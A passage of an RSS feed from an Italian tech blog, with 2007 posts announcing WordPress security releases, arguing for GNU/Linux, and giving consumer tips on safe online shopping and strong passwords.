<img src="http://www.paologatti.it/?ak_action=api_record_view&id=614&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.paologatti.it/2008/05/07/javascript-code-injection-su-wordpress-guida-alla-rimozione-del-codice-maligno/feed</wfw:commentRss>
		<slash:comments>14</slash:comments>
		</item>
		<item>
		<title>Rilasciato WordPress 2.3.2</title>
		<link>http://www.paologatti.it/2007/12/30/rilasciato-wordpress-232</link>
		<comments>http://www.paologatti.it/2007/12/30/rilasciato-wordpress-232#comments</comments>
		<pubDate>Sun, 30 Dec 2007 01:34:37 +0000</pubDate>
		<dc:creator>Paolo</dc:creator>
				<category><![CDATA[Blogosfera]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[2.3.2]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.paologatti.it/2007/12/30/rilasciato-wordpress-232</guid>
		<description><![CDATA[E’ da qualche ora disponibile per il download la versione 2.3.2 di WordPress (lo strumento grazie al quale funziona questo blog): non ci sono grandi novità nel codice, ma sono stati corretti diversi problemi di sicurezza, di cui uno urgente ed importante che corregge un bug relativo ai post in bozza. Inoltre, come bonus, è [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.paologatti.it/wp-content/uploads/wordpress_small.jpg" alt="Wordpress logo small" align="left" />E’ da qualche ora disponibile per il download la <a href="http://wordpress.org/download/" target="_blank" title="Wordpress">versione 2.3.2 di WordPress</a> (lo strumento grazie al quale funziona questo blog): non ci sono grandi novità nel codice, ma sono stati corretti diversi problemi di sicurezza, di cui uno urgente ed importante che corregge un <a href="http://trac.wordpress.org/ticket/5487" title="il bug" target="_blank">bug relativo ai post in bozza</a>.</p>
<p>Inoltre, come bonus, è stata aggiunta la possibilità di personalizzare la pagina di errore della connessione al database (inizialmente prevista per la 2.4)</p>
<p>Correte ad aggiornare i vostri blog scaricando WordPress 2.2.3 <a href="http://wordpress.org/latest.tar.gz" target="_blank" title="Wordpress 2.2.3">da qui</a>.</p>
<p>P.S. <strong>prima di procedere con l’aggiornamento, è consigliabile fare un backup dei file e del database</strong>.</p>
<p>Fonte: <a href="http://feeds.feedburner.com/~r/WordpressItaly/~3/208227965/" title="WordPress Italy" target="_blank">WordPress Italy</a></p>
<img src="http://www.paologatti.it/?ak_action=api_record_view&id=528&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.paologatti.it/2007/12/30/rilasciato-wordpress-232/feed</wfw:commentRss>
		<slash:comments>14</slash:comments>
		</item>
		<item>
		<title>12 motivi per installare GNU/Linux sul vostro computer</title>
		<link>http://www.paologatti.it/2007/10/18/13-motivi-per-installare-gnulinux-sul-vostro-computer</link>
		<comments>http://www.paologatti.it/2007/10/18/13-motivi-per-installare-gnulinux-sul-vostro-computer#comments</comments>
		<pubDate>Thu, 18 Oct 2007 09:30:11 +0000</pubDate>
		<dc:creator>Paolo</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[2007]]></category>
		<category><![CDATA[computer]]></category>
		<category><![CDATA[gnu/linux]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[linuxday]]></category>
		<category><![CDATA[mac]]></category>
		<category><![CDATA[motivi]]></category>

		<guid isPermaLink="false">http://www.paologatti.it/2007/10/18/13-motivi-per-installare-gnulinux-sul-vostro-computer</guid>
		<description><![CDATA[GNU/Linux è un sistema operativo libero di tipo Unix (o unix-like), distribuito con licenza GNU GPL e costituito dall&#8217;integrazione del kernel Linux all&#8217;interno del sistema GNU. Esso è una valida alternativa ai sistemi operativi commerciali come Microsoft Windows o Mac OS X e, in questo articolo, elencherò 12 motivi (in rigoroso ordine sparso!) per i [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.paologatti.it/wp-content/uploads/tux.jpg" alt="Tux" align="left" /><a href="http://it.wikipedia.org/wiki/GNU/Linux" title="GNU/Linux" target="_blank"><strong>GNU/Linux</strong></a> è un <a href="http://it.wikipedia.org/wiki/Sistema_operativo" title="Sistema operativo" target="_blank">sistema operativo</a> <a href="http://it.wikipedia.org/wiki/Software_Libero" title="Software Libero" target="_blank">libero</a> di tipo Unix (o unix-like), distribuito con licenza <a href="http://it.wikipedia.org/wiki/GNU_GPL" title="GNU GPL" target="_blank">GNU GPL</a> e costituito dall&#8217;integrazione del <a href="http://it.wikipedia.org/wiki/Kernel_Linux" title="Kernel Linux" target="_blank">kernel Linux</a> all&#8217;interno del <a href="http://it.wikipedia.org/wiki/Sistema_GNU" title="Sistema GNU" target="_blank">sistema GNU</a>.</p>
<p>Esso è una valida alternativa ai sistemi operativi commerciali come <strong>Microsoft Windows</strong> o <strong>Mac OS X</strong> e, in questo articolo, elencherò 12 motivi (in rigoroso ordine sparso!) per i quali ci si dovrebbe almeno informare su cos&#8217;è e come funziona GNU/Linux:</p>
<ol>
<li><strong>Costo</strong>: salvo rarissime eccezioni le <a href="http://it.wikipedia.org/wiki/Distribuzione_Linux" title="Distribuzioni GNU/Linux" target="_blank"> distribuzioni GNU/Linux</a> sono gratuite e liberamente scaricabili, i sistemi operativi commerciali, al contrario, costano centinaia di euro.</li>
<li><strong>Licenza d&#8217;uso</strong>: tutti noi sappiamo che copiare software, la dove non espressamente consentito dalla licenza d&#8217;uso, è un reato; per non parlare poi dei cosiddetti <em>crack</em> per utilizzare software proprietario violando la relativa licenza d&#8217;uso. Ma perchè andare ad imbarcarsi in avventure pericolose quando esiste software di qualità che fa esattamente tutto quello di cui avete bisogno, che potete scaricare gratuitamente e liberamente dalla rete e nel pieno rispetto della legge?!</li>
<li><strong>Durata nel tempo</strong>: il software open source non scade, perché non è prodotto con criteri commerciali al contrario del software proprietario sviluppato per avere una forma di &#8220;obsolescenza programmata&#8221;: si tratta della strategia commerciale che porta una determinata tecnologia (sia essa hardware o software) a essere sostituita (e quindi resa obsoleta) da una nuova versione dopo un periodo predefinito di tempo. Questo è fondamentale per un&#8217;azienda che basa la sua esistenza sui profitti derivanti dalle vendite del proprio prodotto, ma non lo è assolutamente per la comunità del software libero.<span id="more-457"></span></li>
<li><strong>Requisiti hardware</strong>: anche l&#8217;hardware del vostro computer invecchia e chi sviluppa software proprietario non ha interesse a fornire versioni &#8220;alleggerite&#8221; in grado di supportare hardware non recentissimo (anche in un&#8217;ottica di accordi con i produttori di hardware) il che comporta una compatibilità hardware &#8220;all&#8217;indietro&#8221; di pochi anni. Questo fenomeno è particolarmente evidente in Windows Vista: le &#8220;avanzate&#8221; caratteristiche <img src='http://www.paologatti.it/smilies/msn_question.png' alt='&#40;&#63;&#41;' class='wp-smiley' width='21' height='21' title='&#40;&#63;&#41;' /> di questo sistema operativo fanno sì che richieda importanti risorse hardware, costringendo molti utenti a dover aggiornare o, addirittura, cambiare il proprio computer per poterlo utilizzare. Anche GNU/Linux può naturalmente aver bisogno di risorse hardware particolarmente importanti (a seconda di quello che l&#8217;utente deve fare con il sistema: se volete fare montaggio audio/video avrete bisogno di tanta memoria RAM e un ottimo processore, non c&#8217;è alternativa), ma essendo completamente open source, quindi modificabile e ridistribuibile, esistono numerose versioni che sono espressamente concepite per funzionare con sistemi non particolarmente recenti. Ovviamente bisognerà rinunciare a qualcosa (ad esempio niente grafica tridimensionale con finestre che si infiammano o cose simili), ma il sistema operativo sarà lo stesso funzionante, oggi, domani e anche più in là, finché non riterrete (voi!) che sia passato sufficiente tempo da giustificare l&#8217;acquisto di un nuovo computer.</li>
<li><strong>Prestazioni</strong>: Linux gestisce in maniera estremamente efficiente la memoria RAM del sistema, è possibile scegliere quale tipo di filesystem utilizzare e sfrutta tutte le potenzialità che i moderni processori offrono. Questo è dovuto al fatto che, non essendoci attese di mesi o anni tra una release del sistema operativo e l&#8217;altra, le migliorie vengono introdotte entro brevissimo tempo.</li>
<li><strong>Sicurezza (del sistema operativo)</strong>: lo scorso anno sono stati scoperti ben 48.000 nuovo virus per Windows, rispetto a soli 40 per GNU/Linux. Come se non bastasse, gli utenti Windows, devono preoccuparsi anche di dialer, adware, trojan etc.etc. In fondo, non è un caso se la maggior parte dei server funziona grazie a sistemi *unix, non credete?!</li>
<li><strong>Sicurezza (di applicazioni di terze parti)</strong>: anche le applicazioni installate possono avere problemi di sicurezza ed è quindi necessario aggiornarle ad ogni nuova release. Questo, in Windows, si concretizza in un noioso lavoro manuale mentre, nella maggior parte delle distribuzioni GNU/Linux, esistono delle utility che rendono questa operazione del tutto automatica! Ah, dimenticavo, non è richiesto alcun riavvio dopo aver installato gli aggiornamenti!</li>
<li><strong>Dual boot: </strong>è possibile partizionare il proprio disco rigido e far convivere tranquillamente GNU/Linux e Windows o Mac OS X.</li>
<li><strong>Installazione</strong>: chiunque abbia mai fatto una installazione di Windows da zero sa che questa operazione porta via parecchie ore sia per l&#8217;installazione in sè, sia per trovare, scaricare ed installare i vari software applicativi. GNU/Linux (che, nella maggior parte dei casi, si installa ne giro di 30/40 minuti), invece, include una serie davvero completa di applicazioni e, ovviamente, non richiede nessuna attivazione e/o registrazione.</li>
<li><strong>Reinstallazione del sistema operativo</strong>: non si può semplicemente scaricare una versione aggiornata di Windows (per versione aggiornata non intendo una nuova release, ma semplicemente una versione che abbia tutte le patch rilasciate fino a quel momento), ma si è costretti ad utilizzare il CD in dotazione con il vostro PC e scaricare tutte le patch che Microsoft ha rilasciato da quando il CD è stato fatto. Con Linux, è sufficiente scaricare (in maniera completamente LEGALE e GRATUITA!) l&#8217;ultima versione della distribuzione che utilizzate ed avrete sistema operativo e programmi applicativi aggiornati all&#8217;ultima versione.</li>
<li><strong>Facilità d&#8217;uso</strong>: cerchiamo di sfatare il falso mito che &#8220;GNU/Linux è difficile da installare e da usare&#8221;. E&#8217; vero, esistono delle distribuzioni complesse da utilizzare, ma ne esistono molte altre davvero semplici ed intuitive; ve ne consiglio qualcuna, così potete &#8220;testare con mano&#8221;: <a href="http://www.ubuntu-it.org/" target="_blank" title="Ubuntu">Ubuntu</a>, <a href="http://www.mandrakeitalia.org/" title="Mandriva" target="_blank">Mandriva</a>, <a href="http://it.opensuse.org/Benvenuto_su_openSUSE.org" target="_blank" title="OpenSuse">OpenSuse</a>.</li>
<li><strong>Software applicativo</strong>: i programmi applicativi forniti con Windows sono minimali quindi nella stragrande maggioranza dei casi, gli utenti, sono costretti ad utilizzare software di terze parti (spesso e volentieri, pagandolo). Per GNU/Linux, invece, c&#8217;è una <a href="http://it.wikipedia.org/wiki/Elenco_di_programmi_open_source" title="Elenco programmi open source" target="_blank">quantità di software open source davvero impressionate.</a></li>
</ol>
<p>P.S. vi ricordo che tra una settimana ci sarà il <a href="http://www.linuxday.it/" title="LinuxDay2007" target="_blank">LinuxDay 2007</a>: io parteciperò a quello di Teramo che è organizzato dal <a href="http://www.telug.it/linuxday-2007/" title="TeLUG" target="_blank">TeLUG</a> (di cui faccio parte). Se doveste passare da quelle parti, mi raccomando, fatemi un fischio! <img src='http://www.paologatti.it/smilies/msn_smiley.png' alt='&#58;&#45;&#41;' class='wp-smiley' width='21' height='21' title='&#58;&#45;&#41;' /></p>
<p>Fonti di ispirazioni/informazioni: <a href="http://www.desktoplinux.com/articles/AT5836989728.html" title="DesktopLinux" target="_blank">DesktopLinux</a>, <a href="http://glugto.org/index.php/ita/il_mondo_del_s_l/software_libero/10_motivi_per_scegliere_gnu_linux" title="GLUGTO" target="_blank">GLUGTO</a>.</p>
<img src="http://www.paologatti.it/?ak_action=api_record_view&id=457&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.paologatti.it/2007/10/18/13-motivi-per-installare-gnulinux-sul-vostro-computer/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Rilasciato WordPress 2.2.3</title>
		<link>http://www.paologatti.it/2007/09/09/rilasciato-wordpress-223</link>
		<comments>http://www.paologatti.it/2007/09/09/rilasciato-wordpress-223#comments</comments>
		<pubDate>Sat, 08 Sep 2007 23:58:09 +0000</pubDate>
		<dc:creator>Paolo</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[aggiornamento]]></category>
		<category><![CDATA[wordpress 2.2.3]]></category>

		<guid isPermaLink="false">http://www.paologatti.it/2007/09/09/rilasciato-wordpress-223/</guid>
		<description><![CDATA[E&#8217; da qualche ora disponibile per il download la versione 2.2.3 di WordPress (lo strumento grazie al quale funziona questo blog): non ci sono grandi novità nel codice, ma sono stati corretti diversi bachi di sicurezza (due dei quali ad alta priorità). Per scaricare WordPress 2.2.3 clickate qui, per sapere come aggiornare dalle versioni precedenti [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.paologatti.it/wp-content/uploads/wordpress.jpg" class="noborder" alt="Wordpress" title="Wordpress" align="left" />E&#8217; da qualche ora disponibile per il download la versione 2.2.3 di <a href="http://wordpress.org/" target="_blank" title="Wordpress">WordPress</a> (lo strumento grazie al quale funziona questo blog): non ci sono grandi novità nel codice, ma sono stati corretti diversi bachi di sicurezza (due dei quali ad alta priorità).</p>
<p>Per scaricare WordPress 2.2.3 <a href="http://wordpress.org/latest.tar.gz" target="_blank" title="Wordpress 2.2.3">clickate qui</a>, per sapere come aggiornare dalle versioni precedenti <a href="http://codex.wordpress.org/Upgrading_WordPress" target="_blank" title="Upgrade WordPress">clickate qui</a>.</p>
<p>P.S. <strong>prima di procedere con l’aggiornamento, è consigliabile fare un backup dei file e del database</strong>.</p>
<img src="http://www.paologatti.it/?ak_action=api_record_view&id=369&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.paologatti.it/2007/09/09/rilasciato-wordpress-223/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Come comprare su Internet in sicurezza</title>
		<link>http://www.paologatti.it/2007/08/21/come-fare-acquisti-su-internet-in-sicurezza</link>
		<comments>http://www.paologatti.it/2007/08/21/come-fare-acquisti-su-internet-in-sicurezza#comments</comments>
		<pubDate>Tue, 21 Aug 2007 07:27:32 +0000</pubDate>
		<dc:creator>Paolo</dc:creator>
				<category><![CDATA[Informatica]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[5 sensi]]></category>
		<category><![CDATA[acquistare]]></category>
		<category><![CDATA[ebay]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[polizia postale]]></category>

		<guid isPermaLink="false">http://www.paologatti.it/2007/08/21/come-acquistare-su-internet-in-sicurezza/</guid>
		<description><![CDATA[Fare acquisti su Internet vuol dire comodità, risparmio e, perchè no, anche divertimento. Bastano poche e semplici regole per acquistare online in modo sicuro e senza perdere il piacere dello shopping. Con la campagna &#8220;Buonsenso in tutti i sensi&#8221; la Polizia Postale e eBay.it (ovvero il primo sito di commercio elettronico in Italia), spiegano le [...]]]></description>
			<content:encoded><![CDATA[<p><img align="left" class="noborder" width="226" src="http://www.paologatti.it/wp-content/uploads/buonsenso.gif" alt="Buonsenso in tutti i sensi" height="106" title="Buonsenso in tutti i sensi" />Fare acquisti su Internet vuol dire comodità, risparmio e, perchè no, anche divertimento. Bastano poche e semplici regole per acquistare online in modo sicuro e senza perdere il piacere dello shopping.</p>
<p>Con la campagna &#8220;<a target="_blank" href="http://www.compraconbuonsenso.it/" title="Buonsenso in tutti i sensi">Buonsenso in tutti i sensi</a>&#8221; la <a target="_blank" href="http://www.poliziadistato.it/pds/informatica/" title="Polizia Postale">Polizia Postale</a> e <a target="_blank" href="http://www.ebay.it" title="eBay.it">eBay.it</a> (ovvero il primo sito di commercio elettronico in Italia), spiegano le principali regole per fare acquisti sicuri su Internet, associandole ai 5 sensi:</p>
<ol>
<li><strong>GUARDA prima di scegliere bene la password</strong>: e di non comunicarla mai a nessuno: utilizza almeno 8 caratteri, con una combinazione di lettere, numeri e caratteri speciali. Non usate parole o termini facili da indovinare. Non utilizzate la stessa password per diversi siti o servizi. Per approfondire l&#8217;argomento, vi consiglio di consultare <a target="_blank" href="http://www.paologatti.it/2007/08/09/come-creare-una-password-sicura-e-facile-da-ricordare/" title="Creare una password sicura e facile da ricordare">questo mio post</a>.</li>
<li><strong>ASCOLTA i feedback sulla serietà del venditore</strong> che trovi anche su siti come eBay.</li>
<li><strong>ASSAGGIA prima i tuoi acquisti</strong>, controllando la descrizione e le condizioni di spedizione e consegna e scegli metodi di spedizione tracciabili. Se tutti i dettagli non sono illustrati bene, contatta il venditore prima di procedere con l&#8217;acquisto. Inoltre, per legge puoi recedere da un contratto di acquisto online entro 10 giorni dalla ricezione della merce. Ricordati che vendere e/o acquistare oggetti contraffatti è reato.</li>
<li><strong>TOCCA con mano il pagamento online</strong> e scegli metodi di pagamento sicuri come PayPal, il bonifico bancario, il conto corrente postale, il contrassegno o i servizi di deposito a garanzia. Per pagare i tuoi acquisti online evita di ricaricare la carta prepagata di sconosciuti o di utilizzare servizi di trasferimento contanti come Western Union o Moneygram perchè sono poco sicuri.</li>
<li><strong>FIUTA le false email (phishing)</strong>. Diffida dalle email che ti chiedono di fornire dati riservati, password o informazioni sulla tua carta di credito attraverso link. Le aziende serie non richiedono mai queste informazioni via email.</li>
</ol>
<p>Vi invito, inoltre, a fare <a target="_blank" href="http://pages.compraconbuonsenso.it/test.html" title="test">questo test</a> per valutare le vostre conoscenze sulla sicurezza degli acquisti online e non lasciare scampo ai truffatori della rete!</p>
<img src="http://www.paologatti.it/?ak_action=api_record_view&id=347&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.paologatti.it/2007/08/21/come-fare-acquisti-su-internet-in-sicurezza/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Come creare una password sicura e facile da ricordare</title>
		<link>http://www.paologatti.it/2007/08/09/come-creare-una-password-sicura-e-facile-da-ricordare</link>
		<comments>http://www.paologatti.it/2007/08/09/come-creare-una-password-sicura-e-facile-da-ricordare#comments</comments>
		<pubDate>Thu, 09 Aug 2007 01:04:01 +0000</pubDate>
		<dc:creator>Paolo</dc:creator>
				<category><![CDATA[Informatica]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[complessa]]></category>
		<category><![CDATA[conservazione]]></category>
		<category><![CDATA[creare]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[ricordare]]></category>

		<guid isPermaLink="false">http://www.paologatti.it/2007/08/09/come-creare-una-password-sicura-e-facile-da-ricordare/</guid>
		<description><![CDATA[La scelta di una password è un aspetto di fondamentale importanza per accedere ai servizi in rete protetti: essa non deve essere una semplice chiave per accedere al sistema, come la maggior parte delle persone crede, ma deve essere difficilmente intercettabile, affinchè nessuno possa scoprirla e utilizzare i nostri servizi per scopi fraudolenti e/o di [...]]]></description>
			<content:encoded><![CDATA[<p>La scelta di una password è un aspetto di fondamentale importanza per accedere ai servizi in rete protetti: essa non deve essere una semplice chiave per accedere al sistema, come la maggior parte delle persone crede, ma deve essere <strong>difficilmente intercettabile</strong>, affinchè nessuno possa scoprirla e utilizzare i nostri servizi per scopi fraudolenti e/o di disturbo.</p>
<p>Ecco alcune  semplici  regole che tutti gli utenti dovrebbero osservare:</p>
<ul>
<li>scegliete una <strong>password lunga almeno 8 caratteri</strong></li>
<li><strong>non utilizzate parole di senso compiuto</strong> comunemente utilizzate</li>
<li><strong>evitate i nomi dei vostri figli, del coniuge o di un animale domestico, le date di nascita </strong>e tutte quelle parole che derivano da informazioni personali facilmente ottenibili da malintenzionati</li>
<li><strong>la sicurezza della password aumenta se essa contiene numeri, lettere e simboli</strong> (ne riparleremo tra un attimo, con un esempio pratico)</li>
<li><strong>non usate mai una password che contenga parte del <em>nome utente</em> o <em>dell&#8217;indirizzo e-mail</em></strong></li>
<li><strong>non utilizzate la stessa password per parecchi servizi</strong> online.</li>
</ul>
<p>Ed ora un esempio pratico, nel quale vi illustrerò il metodo che utilizzo per creare le mie password affinchè siano complesse e facili da ricordare:</p>
<ol>
<li>penso ad una frase semplice da ricordare; essendo appassionato di tennis e, in particolare, tifoso di <a href="http://it.wikipedia.org/wiki/Rafael_Nadal" title="Rafael Nadal" target="_blank">Rafael Nadal,</a> ipotizziamo che la frase scelta sia &#8220;<strong>viva nadal</strong>&#8220;</li>
<li>sostituisco i numeri ad alcune lettere (ad esempio inserisco il <strong>4</strong> al posto dalla <strong>a</strong>, l&#8217;<strong>1</strong> al posto della <strong>i</strong>, il <strong>3</strong> al posto della <strong>e</strong> e così via) ed ottengo: <strong>v1v4n4d4l</strong></li>
<li>sostituisco qualche lettera minuscola in maiuscola (in questo esempio la <strong>V</strong> e la <strong>N</strong>) ed ottengo: <strong>V1v4N4d4l</strong></li>
<li>infine, aggiungo un carattere speciale ed ottengo: <strong>V1v4N4d4l!</strong></li>
</ol>
<p>Ricordate, inoltre, che la creazione di una password sicura è solo un punto di partenza che deve necessariamente proseguire con una <strong>corretta conservazione</strong>; ecco alcuni consigli a riguardo:</p>
<ul>
<li><strong>non digitate la password in presenza di estranei</strong></li>
<li><strong>non trascrivete la password </strong> su fogli di carta o, come spesso succede, su bigliettini attaccati al monitor!</li>
<li><strong>non rivelate la vostra password ad altre persone</strong></li>
<li><strong>modificate la password di tanto in tanto</strong>.</li>
</ul>
<p>Concludo l&#8217;articolo segnalandovi due applicazioni online (reperibili <a href="http://www.spiega.com/rez/evaluate_password.php" title="Valutatore di password di Spiega.com" target="_blank">qui</a> e <a href="http://www.microsoft.com/italy/athome/security/privacy/password_checker.mspx" title="Strumento di controllo delle password di Microsoft" target="_blank">qui</a>), in grado di calcolare il livello di sicurezza di una password.</p>
<img src="http://www.paologatti.it/?ak_action=api_record_view&id=332&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.paologatti.it/2007/08/09/come-creare-una-password-sicura-e-facile-da-ricordare/feed</wfw:commentRss>
		<slash:comments>26</slash:comments>
		</item>
		<item>
		<title>Rilasciati WordPress 2.2.2 e 2.0.11</title>
		<link>http://www.paologatti.it/2007/08/05/rilasciati-wordpress-222-e-2011</link>
		<comments>http://www.paologatti.it/2007/08/05/rilasciati-wordpress-222-e-2011#comments</comments>
		<pubDate>Sun, 05 Aug 2007 13:52:27 +0000</pubDate>
		<dc:creator>Paolo</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[bachi]]></category>
		<category><![CDATA[codice]]></category>
		<category><![CDATA[wordpress 2.0.11]]></category>
		<category><![CDATA[wordpress 2.2.2]]></category>

		<guid isPermaLink="false">http://www.paologatti.it/2007/08/05/rilasciati-wordpress-222-e-2011/</guid>
		<description><![CDATA[Sono da qualche ora disponibili per il download le versioni 2.2.2 e 2.0.11 di WordPress (lo strumento grazie al quale funziona questo blog): non ci sono grandi novità nel codice, ma sono stati corretti diversi bachi di sicurezza. Per scaricare WordPress 2.2.2 clickate qui, invece, per scaricare la versione 2.0.11 clickate qui; per sapere come [...]]]></description>
			<content:encoded><![CDATA[<p>Sono da qualche ora disponibili per il download le versioni 2.2.2 e 2.0.11 di <a href="http://wordpress.org/" title="Wordpress" target="_blank">WordPress</a> (lo strumento grazie al quale funziona questo blog): non ci sono grandi novità nel codice, ma sono stati corretti diversi bachi di sicurezza.</p>
<p>Per scaricare WordPress 2.2.2 <a href="http://wordpress.org/latest.tar.gz" title="Wordpress 2.2.2" target="_blank">clickate qui</a>, invece, per scaricare la versione 2.0.11 <a href="http://wordpress.org/wordpress-2.0.11.tar.gz" title="Wordpress 2.0.11" target="_blank">clickate qui</a>; per sapere come aggiornare dalle versioni precedenti <a href="http://codex.wordpress.org/Upgrading_WordPress" title="Upgrade WordPress" target="_blank">clickate qui</a>.</p>
<p>P.S. <strong>prima di procedere con l&#8217;aggiornamento, è consigliabile fare un backup dei file e del database</strong>.</p>
<img src="http://www.paologatti.it/?ak_action=api_record_view&id=330&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.paologatti.it/2007/08/05/rilasciati-wordpress-222-e-2011/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

